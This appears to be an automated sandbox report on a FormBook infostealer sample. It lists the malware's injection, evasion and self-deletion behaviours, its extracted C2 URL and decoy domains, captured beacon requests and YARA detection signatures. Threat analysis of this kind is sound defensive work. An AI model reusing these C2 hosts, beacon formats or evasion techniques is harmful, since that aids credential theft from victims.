Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Nuevo Pedido.exe

Overview

General Information

Sample Name:Nuevo Pedido.exe
Analysis ID:528617
MD5:159c46c59cd8ecb7a2bce707de1bc370
SHA1:e76f6dc42b06e706b6ce49cf6c95c9eaabfc9334
SHA256:7f91403a34cde3f8a1d3a30a2cec9abfb30f5f7eb52f777af78fa0d34f7a27f9
Tags:exeFormbookxloader
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Self deletion via cmd delete
.NET source code contains potential unpacker
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • Nuevo Pedido.exe (PID: 6320 cmdline: "C:\Users\user\Desktop\Nuevo Pedido.exe" MD5: 159C46C59CD8ECB7A2BCE707DE1BC370)
    • Nuevo Pedido.exe (PID: 6464 cmdline: C:\Users\user\Desktop\Nuevo Pedido.exe MD5: 159C46C59CD8ECB7A2BCE707DE1BC370)
      • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cscript.exe (PID: 6536 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: 00D3041E47F99E48DD5FFFEDF60F6304)
          • cmd.exe (PID: 6420 cmdline: /c del "C:\Users\user\Desktop\Nuevo Pedido.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.spoiledzone.com/udeh/"], "decoy": ["pimpyoursmile.com", "mibikeshops.com", "blueprintroslyn.com", "onlinedatingthaiweb.com", "filmweltruhr.com", "apprigutimaunrpgroup.com", "prolineautoservices.com", "thejohnmatt.com", "predialisbolivia.com", "pittsburghdata.center", "janeflwr.com", "usxigroup.com", "canurfaliogli.net", "securebankofamericalog.site", "concernedclimatecitizen.com", "756256.xyz", "blaclyteproductions.com", "chaturey.com", "mesoftbilisim.com", "crochetastitch.com", "biggirlrantz.com", "trenddoffical.com", "eureka.quest", "syuanbao.com", "auspicious.tech", "mypc.host", "hemeishun.com", "3973rollingvalleydrive.com", "lovebydarius.store", "z1liner.com", "pspoint.com", "skincell-advanced.website", "937281.com", "mygranitepro.com", "masterlotz.com", "electricidadygasmx.com", "mmcyxx.com", "fixmetech.com", "teesworkshop.com", "topshelfbudshop.com", "ccnet.club", "myfranciscanshoe.com", "kyrstensinema2024.com", "selectioncoeur.com", "nrgd1.club", "qzttb.net", "ouidles.com", "royaldears.com", "downingmunroe.online", "seawooenc.com", "flagfootballcoaches.com", "tremblock.com", "finsits.com", "rcepjobs.com", "web-control.biz", "notvaccinatedjobs.com", "glueandstack.com", "modularbuildingsolutions.net", "sosibibyslot.website", "dragonmodz.net", "turkishdelightday.xyz", "dentalhealth24.com", "celtabet153.xyz", "pigsandbees.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bec:$sqlite3step: 68 34 1C 7B E1
    • 0x16b08:$sqlite3text: 68 38 2A 90 C5
    • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
    00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 34 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.0.Nuevo Pedido.exe.400000.8.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        3.0.Nuevo Pedido.exe.400000.8.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.0.Nuevo Pedido.exe.400000.8.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x15cd9:$sqlite3step: 68 34 1C 7B E1
        • 0x15dec:$sqlite3step: 68 34 1C 7B E1
        • 0x15d08:$sqlite3text: 68 38 2A 90 C5
        • 0x15e2d:$sqlite3text: 68 38 2A 90 C5
        • 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
        0.2.Nuevo Pedido.exe.2dd8e9c.1.raw.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
          3.0.Nuevo Pedido.exe.400000.8.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            Click to see the 18 entries

            Sigma Overview

            No Sigma rule has matched

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.spoiledzone.com/udeh/"], "decoy": ["pimpyoursmile.com", "mibikeshops.com", "blueprintroslyn.com", "onlinedatingthaiweb.com", "filmweltruhr.com", "apprigutimaunrpgroup.com", "prolineautoservices.com", "thejohnmatt.com", "predialisbolivia.com", "pittsburghdata.center", "janeflwr.com", "usxigroup.com", "canurfaliogli.net", "securebankofamericalog.site", "concernedclimatecitizen.com", "756256.xyz", "blaclyteproductions.com", "chaturey.com", "mesoftbilisim.com", "crochetastitch.com", "biggirlrantz.com", "trenddoffical.com", "eureka.quest", "syuanbao.com", "auspicious.tech", "mypc.host", "hemeishun.com", "3973rollingvalleydrive.com", "lovebydarius.store", "z1liner.com", "pspoint.com", "skincell-advanced.website", "937281.com", "mygranitepro.com", "masterlotz.com", "electricidadygasmx.com", "mmcyxx.com", "fixmetech.com", "teesworkshop.com", "topshelfbudshop.com", "ccnet.club", "myfranciscanshoe.com", "kyrstensinema2024.com", "selectioncoeur.com", "nrgd1.club", "qzttb.net", "ouidles.com", "royaldears.com", "downingmunroe.online", "seawooenc.com", "flagfootballcoaches.com", "tremblock.com", "finsits.com", "rcepjobs.com", "web-control.biz", "notvaccinatedjobs.com", "glueandstack.com", "modularbuildingsolutions.net", "sosibibyslot.website", "dragonmodz.net", "turkishdelightday.xyz", "dentalhealth24.com", "celtabet153.xyz", "pigsandbees.com"]}
            Multi AV Scanner detection for submitted fileShow sources
            Source: Nuevo Pedido.exeVirustotal: Detection: 32%Perma Link
            Source: Nuevo Pedido.exeReversingLabs: Detection: 33%
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 3.0.Nuevo Pedido.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.0.Nuevo Pedido.exe.400000.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.Nuevo Pedido.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.0.Nuevo Pedido.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.Nuevo Pedido.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.0.Nuevo Pedido.exe.400000.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.0.Nuevo Pedido.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.304729594.00000000014C0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.242262290.0000000003F97000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000000.238813583.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.291355057.000000000B790000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.499912414.0000000000700000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000000.239252489.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.273788531.000000000B790000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmp, type: MEMORY
            Source: 3.0.Nuevo Pedido.exe.400000.8.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 3.2.Nuevo Pedido.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 3.0.Nuevo Pedido.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 3.0.Nuevo Pedido.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: Nuevo Pedido.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: Nuevo Pedido.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: cscript.pdbUGP source: Nuevo Pedido.exe, 00000003.00000002.309749696.0000000003460000.00000040.00020000.sdmp, Nuevo Pedido.exe, 00000003.00000002.304821141.0000000001559000.00000004.00000020.sdmp
            Source: Binary string: wntdll.pdbUGP source: Nuevo Pedido.exe, 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Nuevo Pedido.exe, 00000003.00000002.308818280.0000000001AAF000.00000040.00000001.sdmp, cscript.exe, 00000010.00000002.506569206.000000000486F000.00000040.00000001.sdmp, cscript.exe, 00000010.00000002.503908034.0000000004750000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: Nuevo Pedido.exe, Nuevo Pedido.exe, 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Nuevo Pedido.exe, 00000003.00000002.308818280.0000000001AAF000.00000040.00000001.sdmp, cscript.exe, cscript.exe, 00000010.00000002.506569206.000000000486F000.00000040.00000001.sdmp, cscript.exe, 00000010.00000002.503908034.0000000004750000.00000040.00000001.sdmp
            Source: Binary string: cscript.pdb source: Nuevo Pedido.exe, 00000003.00000002.309749696.0000000003460000.00000040.00020000.sdmp, Nuevo Pedido.exe, 00000003.00000002.304821141.0000000001559000.00000004.00000020.sdmp
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 4x nop then pop edi
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 4x nop then pop esi
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 4x nop then pop esi
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 4x nop then pop edi
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 4x nop then pop esi
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 4x nop then pop esi

            Networking:

            barindex
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\explorer.exeDomain query: www.rcepjobs.com
            Source: C:\Windows\explorer.exeDomain query: www.sosibibyslot.website
            Source: C:\Windows\explorer.exeNetwork Connect: 185.53.179.91 80
            Source: C:\Windows\explorer.exeDomain query: www.tremblock.com
            Source: C:\Windows\explorer.exeDomain query: www.securebankofamericalog.site
            Source: C:\Windows\explorer.exeDomain query: www.thejohnmatt.com
            Source: C:\Windows\explorer.exeNetwork Connect: 3.64.163.50 80
            Source: C:\Windows\explorer.exeDomain query: www.blueprintroslyn.com
            Source: C:\Windows\explorer.exeDomain query: www.onlinedatingthaiweb.com
            Source: C:\Windows\explorer.exeNetwork Connect: 192.232.250.147 80
            Source: C:\Windows\explorer.exeNetwork Connect: 185.53.178.53 80
            Source: C:\Windows\explorer.exeDomain query: www.downingmunroe.online
            Source: C:\Windows\explorer.exeNetwork Connect: 209.17.116.163 80
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs: www.spoiledzone.com/udeh/
            Source: Joe Sandbox ViewASN Name: TEAMINTERNET-ASDE TEAMINTERNET-ASDE
            Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
            Source: global trafficHTTP traffic detected: GET /udeh/?2dYxhfjx=E9wG6DB+gJGrCrA7N2npAfbzd/MNcvRP0YSWLCgDnz2mMEe2tMuLmGDUaa3MX32MwTcI&s6AD=5jltOBY8-rN HTTP/1.1Host: www.tremblock.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /udeh/?2dYxhfjx=Sh2Frx7Ne5Gbf0GZF0aHN0EyZlj99LhHOr4v0jLu0VOTkpyLoQ3tHVxja8cQ+qoaRshC&s6AD=5jltOBY8-rN HTTP/1.1Host: www.rcepjobs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /udeh/?2dYxhfjx=XsaaYVs5B+09RIkVBuB9uz7A4nUjKuiPTgX8t5JQ0XDGnKq9QQr8GjRKS5XBt9MDEtTg&s6AD=5jltOBY8-rN HTTP/1.1Host: www.downingmunroe.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /udeh/?2dYxhfjx=ov0JDamFDTMX/NINQ6dXBWp9D4Bna97YEIhf43toIE+QttJEvvSyuVruiBSF6Ny2F/6R&s6AD=5jltOBY8-rN HTTP/1.1Host: www.thejohnmatt.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /udeh/?2dYxhfjx=WESqUOlrd4N7F4Vkh8SPM0KezyJ+WDn1u3Qqm333AtEi2E+6MV6LR8TxaNrvEi0KysNf&s6AD=5jltOBY8-rN HTTP/1.1Host: www.onlinedatingthaiweb.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: Joe Sandbox ViewIP Address: 3.64.163.50 3.64.163.50
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 25 Nov 2021 14:10:30 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 25 Nov 2021 14:11:10 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: Nuevo Pedido.exe, 00000000.00000002.241689369.0000000002E3A000.00000004.00000001.sdmp, Nuevo Pedido.exe, 00000000.00000002.241535390.0000000002D71000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: cscript.exe, 00000010.00000002.508075136.0000000004E02000.00000004.00020000.sdmpString found in binary or memory: http://www.rcepjobs.com
            Source: unknownDNS traffic detected: queries for: www.tremblock.com
            Source: global trafficHTTP traffic detected: GET /udeh/?2dYxhfjx=E9wG6DB+gJGrCrA7N2npAfbzd/MNcvRP0YSWLCgDnz2mMEe2tMuLmGDUaa3MX32MwTcI&s6AD=5jltOBY8-rN HTTP/1.1Host: www.tremblock.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /udeh/?2dYxhfjx=Sh2Frx7Ne5Gbf0GZF0aHN0EyZlj99LhHOr4v0jLu0VOTkpyLoQ3tHVxja8cQ+qoaRshC&s6AD=5jltOBY8-rN HTTP/1.1Host: www.rcepjobs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /udeh/?2dYxhfjx=XsaaYVs5B+09RIkVBuB9uz7A4nUjKuiPTgX8t5JQ0XDGnKq9QQr8GjRKS5XBt9MDEtTg&s6AD=5jltOBY8-rN HTTP/1.1Host: www.downingmunroe.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /udeh/?2dYxhfjx=ov0JDamFDTMX/NINQ6dXBWp9D4Bna97YEIhf43toIE+QttJEvvSyuVruiBSF6Ny2F/6R&s6AD=5jltOBY8-rN HTTP/1.1Host: www.thejohnmatt.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /udeh/?2dYxhfjx=WESqUOlrd4N7F4Vkh8SPM0KezyJ+WDn1u3Qqm333AtEi2E+6MV6LR8TxaNrvEi0KysNf&s6AD=5jltOBY8-rN HTTP/1.1Host: www.onlinedatingthaiweb.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

            E-Banking Fraud:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 3.0.Nuevo Pedido.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.0.Nuevo Pedido.exe.400000.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.Nuevo Pedido.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.0.Nuevo Pedido.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.Nuevo Pedido.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.0.Nuevo Pedido.exe.400000.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.0.Nuevo Pedido.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.304729594.00000000014C0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.242262290.0000000003F97000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000000.238813583.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.291355057.000000000B790000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.499912414.0000000000700000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000000.239252489.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.273788531.000000000B790000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmp, type: MEMORY

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: 3.0.Nuevo Pedido.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 3.0.Nuevo Pedido.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 3.0.Nuevo Pedido.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 3.0.Nuevo Pedido.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 3.2.Nuevo Pedido.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 3.2.Nuevo Pedido.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 3.0.Nuevo Pedido.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 3.0.Nuevo Pedido.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 3.2.Nuevo Pedido.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 3.2.Nuevo Pedido.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 3.0.Nuevo Pedido.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 3.0.Nuevo Pedido.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 3.0.Nuevo Pedido.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 3.0.Nuevo Pedido.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000003.00000002.304729594.00000000014C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000003.00000002.304729594.00000000014C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.242262290.0000000003F97000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.242262290.0000000003F97000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000003.00000000.238813583.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000003.00000000.238813583.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000000.291355057.000000000B790000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000000.291355057.000000000B790000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
